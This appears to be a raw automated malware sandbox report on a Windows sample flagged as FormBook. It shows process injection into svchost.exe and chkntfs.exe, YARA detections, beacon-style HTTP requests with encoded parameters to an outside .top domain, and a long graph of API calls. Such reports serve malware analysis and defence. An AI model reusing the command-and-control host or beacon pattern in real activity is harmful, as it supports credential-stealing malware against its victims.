                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0mAv7VSk0SO4%2B5zlY6rnMYxnYfjjvDHA6b%2FXrG4qjNN8I6P0EL6UbW%2Fo%2F9DW0ugn6fAmvBcEDZmiZwDI84%2F5943lLf0HYOvYC51M6eY9GuynBYwUxvDh%2B2I8RFqyvnfUyrw1"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 90140ea659960fa8-EWR
                                                    Content-Encoding: gzip
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1433&min_rtt=1433&rtt_var=716&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1809&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    24 | 192.168.2.6 | 50013 | 104.21.16.1 | 80 | 6688 | C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 13, 2025 09:36:14.033524036 CET | 515 | OUT | GET /utww/?YFCLW=BxgTctSh&CviT=tlTwcU9ZWjUkkDOfL8m8hKdUQz2PcyBI6lKxmlk4uDhIu7zh7TbGiDYhoS5CKbA93kURRma0w2BXBhIfz9bvypQbFpT5jG8x4isXk855maVsJaNYXMtMyHgYaLu1BwVeMhPbSn8= HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.mzkd6gp5.top
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Jan 13, 2025 09:36:14.943185091 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 13 Jan 2025 08:36:14 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fdjmh9Mh8xzsQjUIEsH53RNr4aDLOsqBF%2BZ4Esstoz5GPkA2JlAtvNo%2BbdwariWa8UHITWiBuM03tjddz62ymvkTOGMj0rshp1svyMvFA%2BpkmKLyTA2WpdUWQO%2BXy18JXDwE"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 90140eb64e7d1899-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1579&min_rtt=1579&rtt_var=789&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=515&delivery_rate=0&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                    Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendl
                                                    Jan 13, 2025 09:36:14.943207979 CET | 92 | IN | Data Ascii: y error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                    Target ID:0
                                                    Start time:03:33:19
                                                    Start date:13/01/2025
                                                    Path:C:\Users\user\Desktop\1001-13.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\1001-13.exe"
                                                    Imagebase:0xe30000
                                                    File size:1'616'384 bytes
                                                    MD5 hash:A3356244CC31500C395570F65839865D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:2
                                                    Start time:03:33:20
                                                    Start date:13/01/2025
                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\1001-13.exe"
                                                    Imagebase:0xf30000
                                                    File size:46'504 bytes
                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2629802419.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2630146597.0000000003300000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2630585568.0000000005750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:7
                                                    Start time:03:34:00
                                                    Start date:13/01/2025
                                                    Path:C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe"
                                                    Imagebase:0xb40000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3995040974.0000000004620000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:8
                                                    Start time:03:34:03
                                                    Start date:13/01/2025
                                                    Path:C:\Windows\SysWOW64\chkntfs.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\chkntfs.exe"
                                                    Imagebase:0x7ff7934f0000
                                                    File size:19'968 bytes
                                                    MD5 hash:A9B42ED1B14BB22EF07CCC8228697408
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3994023782.0000000000A30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3993353772.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3995415844.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:moderate
                                                    Has exited:false

                                                    Target ID:9
                                                    Start time:03:34:16
                                                    Start date:13/01/2025
                                                    Path:C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe"
                                                    Imagebase:0xb40000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:10
                                                    Start time:03:34:27
                                                    Start date:13/01/2025
                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                    Imagebase:0x7ff728280000
                                                    File size:676'768 bytes
                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true


                                                      Execution Graph

                                                      Execution Coverage:2.7%
                                                      Dynamic/Decrypted Code Coverage:2.1%
                                                      Signature Coverage:3.2%
                                                      Total number of Nodes:1658
                                                      Total number of Limit Nodes:42
__wsopen_s 26 API calls 96224->96227 96225->96218 96228 e6870e GetLastError 96225->96228 96227->96230 96228->96218 96229->96212 96230->96218 96230->96222 96231->96212 96232->96214 96234 e653e6 96233->96234 96235 e653d1 96233->96235 96238 e5f2c6 __dosmaperr 20 API calls 96234->96238 96241 e6540b 96234->96241 96236 e5f2c6 __dosmaperr 20 API calls 96235->96236 96237 e653d6 96236->96237 96240 e5f2d9 __dosmaperr 20 API calls 96237->96240 96239 e65416 96238->96239 96242 e5f2d9 __dosmaperr 20 API calls 96239->96242 96243 e653de 96240->96243 96241->96219 96244 e6541e 96242->96244 96243->96219 96245 e627ec ___std_exception_copy 26 API calls 96244->96245 96245->96243 96246->96223 96247->96229 96249 e39cc2 _wcslen 96248->96249 96250 e4fe0b 22 API calls 96249->96250 96251 e39cea __fread_nolock 96250->96251 96252 e4fddb 22 API calls 96251->96252 96253 e39d00 96252->96253 96253->95733 96254->95743 96255 e72ba5 96256 e32b25 96255->96256 96257 e72baf 96255->96257 96283 e32b83 7 API calls 96256->96283 96298 e33a5a 96257->96298 96260 e72bb8 96263 e39cb3 22 API calls 96260->96263 96265 e72bc6 96263->96265 96264 e32b2f 96272 e32b44 96264->96272 96287 e33837 96264->96287 96266 e72bf5 96265->96266 96267 e72bce 96265->96267 96270 e333c6 22 API calls 96266->96270 96305 e333c6 96267->96305 96281 e72bf1 GetForegroundWindow ShellExecuteW 96270->96281 96277 e32b5f 96272->96277 96297 e330f2 Shell_NotifyIconW ___scrt_fastfail 96272->96297 96280 e32b66 SetCurrentDirectoryW 96277->96280 96278 e72c26 96278->96277 96279 e333c6 22 API calls 96279->96281 96282 e32b7a 96280->96282 96281->96278 96323 e32cd4 7 API calls 96283->96323 96285 e32b2a 96286 e32c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 96285->96286 96286->96264 96288 e33862 ___scrt_fastfail 96287->96288 96324 e34212 96288->96324 96292 e338e8 96293 e73386 Shell_NotifyIconW 96292->96293 96294 e33906 Shell_NotifyIconW 96292->96294 96328 e33923 96294->96328 96296 e3391c 96296->96272 96297->96277 96299 e71f50 __wsopen_s 96298->96299 
96300 e33a67 GetModuleFileNameW 96299->96300 96301 e39cb3 22 API calls 96300->96301 96302 e33a8d 96301->96302 96303 e33aa2 23 API calls 96302->96303 96304 e33a97 96303->96304 96304->96260 96306 e730bb 96305->96306 96307 e333dd 96305->96307 96309 e4fddb 22 API calls 96306->96309 96360 e333ee 96307->96360 96311 e730c5 _wcslen 96309->96311 96310 e333e8 96314 e36350 96310->96314 96312 e4fe0b 22 API calls 96311->96312 96313 e730fe __fread_nolock 96312->96313 96315 e36362 96314->96315 96316 e74a51 96314->96316 96375 e36373 96315->96375 96385 e34a88 22 API calls __fread_nolock 96316->96385 96319 e74a5b 96321 e74a67 96319->96321 96322 e3a8c7 22 API calls 96319->96322 96320 e3636e 96320->96279 96322->96321 96323->96285 96325 e735a4 96324->96325 96326 e338b7 96324->96326 96325->96326 96327 e735ad DestroyIcon 96325->96327 96326->96292 96350 e9c874 42 API calls _strftime 96326->96350 96327->96326 96329 e33a13 96328->96329 96330 e3393f 96328->96330 96329->96296 96351 e36270 96330->96351 96333 e73393 LoadStringW 96336 e733ad 96333->96336 96334 e3395a 96335 e36b57 22 API calls 96334->96335 96337 e3396f 96335->96337 96344 e33994 ___scrt_fastfail 96336->96344 96356 e3a8c7 96336->96356 96338 e733c9 96337->96338 96339 e3397c 96337->96339 96340 e36350 22 API calls 96338->96340 96339->96336 96342 e33986 96339->96342 96345 e733d7 96340->96345 96343 e36350 22 API calls 96342->96343 96343->96344 96347 e339f9 Shell_NotifyIconW 96344->96347 96345->96344 96346 e333c6 22 API calls 96345->96346 96348 e733f9 96346->96348 96347->96329 96349 e333c6 22 API calls 96348->96349 96349->96344 96350->96292 96352 e4fe0b 22 API calls 96351->96352 96353 e36295 96352->96353 96354 e4fddb 22 API calls 96353->96354 96355 e3394d 96354->96355 96355->96333 96355->96334 96357 e3a8ea __fread_nolock 96356->96357 96358 e3a8db 96356->96358 96357->96344 96358->96357 96359 e4fe0b 22 API calls 96358->96359 96359->96357 96361 e333fe _wcslen 96360->96361 96362 e33411 96361->96362 96363 e7311d 96361->96363 96370 e3a587 
96362->96370 96364 e4fddb 22 API calls 96363->96364 96366 e73127 96364->96366 96368 e4fe0b 22 API calls 96366->96368 96367 e3341e __fread_nolock 96367->96310 96369 e73157 __fread_nolock 96368->96369 96372 e3a59d 96370->96372 96374 e3a598 __fread_nolock 96370->96374 96371 e7f80f 96372->96371 96373 e4fe0b 22 API calls 96372->96373 96373->96374 96374->96367 96376 e363b6 __fread_nolock 96375->96376 96377 e36382 96375->96377 96376->96320 96377->96376 96378 e74a82 96377->96378 96379 e363a9 96377->96379 96381 e4fddb 22 API calls 96378->96381 96380 e3a587 22 API calls 96379->96380 96380->96376 96382 e74a91 96381->96382 96383 e4fe0b 22 API calls 96382->96383 96384 e74ac5 __fread_nolock 96383->96384 96385->96319 96386 e68402 96391 e681be 96386->96391 96389 e6842a 96396 e681ef try_get_first_available_module 96391->96396 96393 e683ee 96410 e627ec 26 API calls ___std_exception_copy 96393->96410 96395 e68343 96395->96389 96403 e70984 96395->96403 96396->96396 96402 e68338 96396->96402 96406 e58e0b 40 API calls 2 library calls 96396->96406 96398 e6838c 96398->96402 96407 e58e0b 40 API calls 2 library calls 96398->96407 96400 e683ab 96400->96402 96408 e58e0b 40 API calls 2 library calls 96400->96408 96402->96395 96409 e5f2d9 20 API calls _abort 96402->96409 96411 e70081 96403->96411 96405 e7099f 96405->96389 96406->96398 96407->96400 96408->96402 96409->96393 96410->96395 96413 e7008d ___scrt_is_nonwritable_in_current_image 96411->96413 96412 e7009b 96469 e5f2d9 20 API calls _abort 96412->96469 96413->96412 96415 e700d4 96413->96415 96422 e7065b 96415->96422 96416 e700a0 96470 e627ec 26 API calls ___std_exception_copy 96416->96470 96421 e700aa __wsopen_s 96421->96405 96472 e7042f 96422->96472 96425 e706a6 96490 e65221 96425->96490 96426 e7068d 96504 e5f2c6 20 API calls _abort 96426->96504 96429 e70692 96505 e5f2d9 20 API calls _abort 96429->96505 96430 e706ab 96431 e706b4 96430->96431 96432 e706cb 96430->96432 96506 e5f2c6 20 API calls _abort 96431->96506 96503 e7039a CreateFileW 
96432->96503 96436 e700f8 96471 e70121 LeaveCriticalSection __wsopen_s 96436->96471 96437 e706b9 96507 e5f2d9 20 API calls _abort 96437->96507 96438 e70781 GetFileType 96441 e707d3 96438->96441 96442 e7078c GetLastError 96438->96442 96440 e70756 GetLastError 96509 e5f2a3 20 API calls __dosmaperr 96440->96509 96512 e6516a 21 API calls 2 library calls 96441->96512 96510 e5f2a3 20 API calls __dosmaperr 96442->96510 96443 e70704 96443->96438 96443->96440 96508 e7039a CreateFileW 96443->96508 96447 e7079a CloseHandle 96447->96429 96448 e707c3 96447->96448 96511 e5f2d9 20 API calls _abort 96448->96511 96450 e70749 96450->96438 96450->96440 96452 e707f4 96454 e70840 96452->96454 96513 e705ab 72 API calls 3 library calls 96452->96513 96453 e707c8 96453->96429 96459 e7086d 96454->96459 96514 e7014d 72 API calls 4 library calls 96454->96514 96457 e70866 96458 e7087e 96457->96458 96457->96459 96458->96436 96461 e708fc CloseHandle 96458->96461 96460 e686ae __wsopen_s 29 API calls 96459->96460 96460->96436 96515 e7039a CreateFileW 96461->96515 96463 e70927 96464 e7095d 96463->96464 96465 e70931 GetLastError 96463->96465 96464->96436 96516 e5f2a3 20 API calls __dosmaperr 96465->96516 96467 e7093d 96517 e65333 21 API calls 2 library calls 96467->96517 96469->96416 96470->96421 96471->96421 96473 e7046a 96472->96473 96474 e70450 96472->96474 96518 e703bf 96473->96518 96474->96473 96525 e5f2d9 20 API calls _abort 96474->96525 96477 e7045f 96526 e627ec 26 API calls ___std_exception_copy 96477->96526 96479 e704a2 96480 e704d1 96479->96480 96527 e5f2d9 20 API calls _abort 96479->96527 96488 e70524 96480->96488 96529 e5d70d 26 API calls 2 library calls 96480->96529 96483 e7051f 96485 e7059e 96483->96485 96483->96488 96484 e704c6 96528 e627ec 26 API calls ___std_exception_copy 96484->96528 96530 e627fc 11 API calls _abort 96485->96530 96488->96425 96488->96426 96489 e705aa 96491 e6522d ___scrt_is_nonwritable_in_current_image 96490->96491 96533 e62f5e EnterCriticalSection 96491->96533 
96493 e6527b 96534 e6532a 96493->96534 96495 e65234 96495->96493 96496 e65259 96495->96496 96500 e652c7 EnterCriticalSection 96495->96500 96537 e65000 96496->96537 96497 e652a4 __wsopen_s 96497->96430 96500->96493 96501 e652d4 LeaveCriticalSection 96500->96501 96501->96495 96503->96443 96504->96429 96505->96436 96506->96437 96507->96429 96508->96450 96509->96429 96510->96447 96511->96453 96512->96452 96513->96454 96514->96457 96515->96463 96516->96467 96517->96464 96519 e703d7 96518->96519 96520 e703f2 96519->96520 96531 e5f2d9 20 API calls _abort 96519->96531 96520->96479 96522 e70416 96532 e627ec 26 API calls ___std_exception_copy 96522->96532 96524 e70421 96524->96479 96525->96477 96526->96473 96527->96484 96528->96480 96529->96483 96530->96489 96531->96522 96532->96524 96533->96495 96545 e62fa6 LeaveCriticalSection 96534->96545 96536 e65331 96536->96497 96538 e64c7d _abort 20 API calls 96537->96538 96541 e65012 96538->96541 96539 e6501f 96540 e629c8 _free 20 API calls 96539->96540 96542 e65071 96540->96542 96541->96539 96546 e63405 11 API calls 2 library calls 96541->96546 96542->96493 96544 e65147 EnterCriticalSection 96542->96544 96544->96493 96545->96536 96546->96541 96547 e3dee5 96550 e3b710 96547->96550 96551 e3b72b 96550->96551 96552 e800f8 96551->96552 96553 e80146 96551->96553 96575 e3b750 96551->96575 96556 e80102 96552->96556 96559 e8010f 96552->96559 96552->96575 96616 eb58a2 207 API calls 2 library calls 96553->96616 96614 eb5d33 207 API calls 96556->96614 96570 e3ba20 96559->96570 96615 eb61d0 207 API calls 2 library calls 96559->96615 96562 e803d9 96562->96562 96565 e3ba4e 96567 e80322 96619 eb5c0c 82 API calls 96567->96619 96570->96565 96620 ea359c 82 API calls __wsopen_s 96570->96620 96575->96565 96575->96567 96575->96570 96576 e4d336 40 API calls 96575->96576 96577 e3bbe0 40 API calls 96575->96577 96579 e3a8c7 22 API calls 96575->96579 96581 e3ec40 96575->96581 96605 e3a81b 41 API calls 96575->96605 96606 e4d2f0 40 API calls 96575->96606 96607 
e4a01b 207 API calls 96575->96607 96608 e50242 5 API calls __Init_thread_wait 96575->96608 96609 e4edcd 22 API calls 96575->96609 96610 e500a3 29 API calls __onexit 96575->96610 96611 e501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96575->96611 96612 e4ee53 82 API calls 96575->96612 96613 e4e5ca 207 API calls 96575->96613 96617 e3aceb 23 API calls messages 96575->96617 96618 e8f6bf 23 API calls 96575->96618 96576->96575 96577->96575 96579->96575 96582 e3ec76 messages 96581->96582 96583 e3fef7 96582->96583 96586 e4fddb 22 API calls 96582->96586 96587 e84600 96582->96587 96588 e84b0b 96582->96588 96592 e50242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96582->96592 96593 e3a8c7 22 API calls 96582->96593 96596 e3fbe3 96582->96596 96597 e3a961 22 API calls 96582->96597 96598 e500a3 29 API calls pre_c_initialization 96582->96598 96601 e84beb 96582->96601 96602 e501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96582->96602 96603 e3ed9d messages 96582->96603 96604 e3f3ae messages 96582->96604 96621 e401e0 207 API calls 2 library calls 96582->96621 96622 e406a0 41 API calls messages 96582->96622 96590 e3a8c7 22 API calls 96583->96590 96583->96603 96586->96582 96594 e3a8c7 22 API calls 96587->96594 96587->96603 96624 ea359c 82 API calls __wsopen_s 96588->96624 96590->96603 96592->96582 96593->96582 96594->96603 96599 e84bdc 96596->96599 96596->96603 96596->96604 96597->96582 96598->96582 96625 ea359c 82 API calls __wsopen_s 96599->96625 96626 ea359c 82 API calls __wsopen_s 96601->96626 96602->96582 96603->96575 96604->96603 96623 ea359c 82 API calls __wsopen_s 96604->96623 96605->96575 96606->96575 96607->96575 96608->96575 96609->96575 96610->96575 96611->96575 96612->96575 96613->96575 96614->96559 96615->96570 96616->96575 96617->96575 96618->96575 96619->96570 96620->96562 96621->96582 96622->96582 96623->96603 96624->96603 96625->96601 96626->96603 
96627 e31044 96632 e310f3 96627->96632 96629 e3104a 96668 e500a3 29 API calls __onexit 96629->96668 96631 e31054 96669 e31398 96632->96669 96636 e3116a 96637 e3a961 22 API calls 96636->96637 96638 e31174 96637->96638 96639 e3a961 22 API calls 96638->96639 96640 e3117e 96639->96640 96641 e3a961 22 API calls 96640->96641 96642 e31188 96641->96642 96643 e3a961 22 API calls 96642->96643 96644 e311c6 96643->96644 96645 e3a961 22 API calls 96644->96645 96646 e31292 96645->96646 96679 e3171c 96646->96679 96650 e312c4 96651 e3a961 22 API calls 96650->96651 96652 e312ce 96651->96652 96700 e41940 96652->96700 96654 e312f9 96710 e31aab 96654->96710 96656 e31315 96657 e31325 GetStdHandle 96656->96657 96658 e72485 96657->96658 96659 e3137a 96657->96659 96658->96659 96660 e7248e 96658->96660 96662 e31387 OleInitialize 96659->96662 96661 e4fddb 22 API calls 96660->96661 96663 e72495 96661->96663 96662->96629 96717 ea011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 96663->96717 96665 e7249e 96718 ea0944 CreateThread 96665->96718 96667 e724aa CloseHandle 96667->96659 96668->96631 96719 e313f1 96669->96719 96672 e313f1 22 API calls 96673 e313d0 96672->96673 96674 e3a961 22 API calls 96673->96674 96675 e313dc 96674->96675 96676 e36b57 22 API calls 96675->96676 96677 e31129 96676->96677 96678 e31bc3 6 API calls 96677->96678 96678->96636 96680 e3a961 22 API calls 96679->96680 96681 e3172c 96680->96681 96682 e3a961 22 API calls 96681->96682 96683 e31734 96682->96683 96684 e3a961 22 API calls 96683->96684 96685 e3174f 96684->96685 96686 e4fddb 22 API calls 96685->96686 96687 e3129c 96686->96687 96688 e31b4a 96687->96688 96689 e31b58 96688->96689 96690 e3a961 22 API calls 96689->96690 96691 e31b63 96690->96691 96692 e3a961 22 API calls 96691->96692 96693 e31b6e 96692->96693 96694 e3a961 22 API calls 96693->96694 96695 e31b79 96694->96695 96696 e3a961 22 API calls 96695->96696 96697 e31b84 96696->96697 96698 e4fddb 22 API 
calls 96697->96698 96699 e31b96 RegisterWindowMessageW 96698->96699 96699->96650 96701 e41981 96700->96701 96707 e4195d 96700->96707 96726 e50242 5 API calls __Init_thread_wait 96701->96726 96703 e4198b 96703->96707 96727 e501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96703->96727 96705 e48727 96709 e4196e 96705->96709 96729 e501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96705->96729 96707->96709 96728 e50242 5 API calls __Init_thread_wait 96707->96728 96709->96654 96711 e31abb 96710->96711 96712 e7272d 96710->96712 96714 e4fddb 22 API calls 96711->96714 96730 ea3209 23 API calls 96712->96730 96716 e31ac3 96714->96716 96715 e72738 96716->96656 96717->96665 96718->96667 96731 ea092a 28 API calls 96718->96731 96720 e3a961 22 API calls 96719->96720 96721 e313fc 96720->96721 96722 e3a961 22 API calls 96721->96722 96723 e31404 96722->96723 96724 e3a961 22 API calls 96723->96724 96725 e313c6 96724->96725 96725->96672 96726->96703 96727->96707 96728->96705 96729->96709 96730->96715 96732 e82a00 96747 e3d7b0 messages 96732->96747 96733 e3db11 PeekMessageW 96733->96747 96734 e3d807 GetInputState 96734->96733 96734->96747 96736 e81cbe TranslateAcceleratorW 96736->96747 96737 e3da04 timeGetTime 96737->96747 96738 e3db73 TranslateMessage DispatchMessageW 96739 e3db8f PeekMessageW 96738->96739 96739->96747 96740 e3dbaf Sleep 96755 e3dbc0 96740->96755 96741 e82b74 Sleep 96741->96755 96742 e4e551 timeGetTime 96742->96755 96743 e81dda timeGetTime 96851 e4e300 23 API calls 96743->96851 96746 e82c0b GetExitCodeProcess 96748 e82c21 WaitForSingleObject 96746->96748 96749 e82c37 CloseHandle 96746->96749 96747->96733 96747->96734 96747->96736 96747->96737 96747->96738 96747->96739 96747->96740 96747->96741 96747->96743 96752 e3d9d5 96747->96752 96760 e3ec40 207 API calls 96747->96760 96764 e3dd50 96747->96764 96771 e3dfd0 96747->96771 96794 e41310 96747->96794 96849 e3bf40 207 API calls 2 library calls 96747->96849 96850 e4edf6 
IsDialogMessageW GetClassLongW 96747->96850 96852 ea3a2a 23 API calls 96747->96852 96853 ea359c 82 API calls __wsopen_s 96747->96853 96748->96747 96748->96749 96749->96755 96750 e82a31 96750->96752 96751 ec29bf GetForegroundWindow 96751->96755 96754 e82ca9 Sleep 96754->96747 96755->96742 96755->96746 96755->96747 96755->96750 96755->96751 96755->96752 96755->96754 96854 eb5658 23 API calls 96755->96854 96855 e9e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 96755->96855 96856 e9d4dc 47 API calls 96755->96856 96760->96747 96765 e3dd83 96764->96765 96766 e3dd6f 96764->96766 96858 ea359c 82 API calls __wsopen_s 96765->96858 96857 e3d260 207 API calls 2 library calls 96766->96857 96769 e3dd7a 96769->96747 96770 e82f75 96770->96770 96772 e3e010 96771->96772 96785 e3e0dc messages 96772->96785 96861 e50242 5 API calls __Init_thread_wait 96772->96861 96775 e82fca 96777 e3a961 22 API calls 96775->96777 96775->96785 96776 e3a961 22 API calls 96776->96785 96779 e82fe4 96777->96779 96862 e500a3 29 API calls __onexit 96779->96862 96782 e82fee 96863 e501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96782->96863 96784 ea359c 82 API calls 96784->96785 96785->96776 96785->96784 96788 e3a8c7 22 API calls 96785->96788 96789 e3ec40 207 API calls 96785->96789 96790 e404f0 22 API calls 96785->96790 96791 e3e3e1 96785->96791 96859 e3a81b 41 API calls 96785->96859 96860 e4a308 207 API calls 96785->96860 96864 e50242 5 API calls __Init_thread_wait 96785->96864 96865 e500a3 29 API calls __onexit 96785->96865 96866 e501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96785->96866 96867 eb47d4 207 API calls 96785->96867 96868 eb68c1 207 API calls 96785->96868 96788->96785 96789->96785 96790->96785 96791->96747 96795 e41376 96794->96795 96796 e417b0 96794->96796 96798 e41390 96795->96798 96799 e86331 96795->96799 97021 e50242 5 API calls __Init_thread_wait 96796->97021 96803 e41940 9 API calls 96798->96803 96800 
e8633d 96799->96800 96980 eb709c 96799->96980 96800->96747 96802 e417ba 96804 e417fb 96802->96804 96807 e39cb3 22 API calls 96802->96807 96805 e413a0 96803->96805 96809 e86346 96804->96809 96811 e4182c 96804->96811 96806 e41940 9 API calls 96805->96806 96808 e413b6 96806->96808 96815 e417d4 96807->96815 96808->96804 96810 e413ec 96808->96810 97026 ea359c 82 API calls __wsopen_s 96809->97026 96810->96809 96834 e41408 __fread_nolock 96810->96834 97023 e3aceb 23 API calls messages 96811->97023 96814 e41839 97024 e4d217 207 API calls 96814->97024 97022 e501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96815->97022 96818 e8636e 97027 ea359c 82 API calls __wsopen_s 96818->97027 96819 e4152f 96821 e4153c 96819->96821 96822 e863d1 96819->96822 96824 e41940 9 API calls 96821->96824 97029 eb5745 54 API calls _wcslen 96822->97029 96825 e41549 96824->96825 96830 e41940 9 API calls 96825->96830 96840 e415c7 messages 96825->96840 96826 e4fddb 22 API calls 96826->96834 96827 e4fe0b 22 API calls 96827->96834 96828 e41872 97025 e4faeb 23 API calls 96828->97025 96829 e4171d 96829->96747 96838 e41563 96830->96838 96833 e3ec40 207 API calls 96833->96834 96834->96814 96834->96818 96834->96819 96834->96826 96834->96827 96834->96833 96835 e863b2 96834->96835 96834->96840 97028 ea359c 82 API calls __wsopen_s 96835->97028 96836 e41940 9 API calls 96836->96840 96838->96840 96842 e3a8c7 22 API calls 96838->96842 96840->96828 96840->96836 96841 e4167b messages 96840->96841 96869 ea744a 96840->96869 96925 ea83da 96840->96925 96928 eaf0ec 96840->96928 96937 e36246 96840->96937 96941 eb958b 96840->96941 96944 ebe204 96840->96944 97030 ea359c 82 API calls __wsopen_s 96840->97030 96841->96829 97020 e4ce17 22 API calls messages 96841->97020 96842->96840 96849->96747 96850->96747 96851->96747 96852->96747 96853->96747 96854->96755 96855->96755 96856->96755 96857->96769 96858->96770 96859->96785 96860->96785 96861->96775 96862->96782 96863->96785 96864->96785 96865->96785 
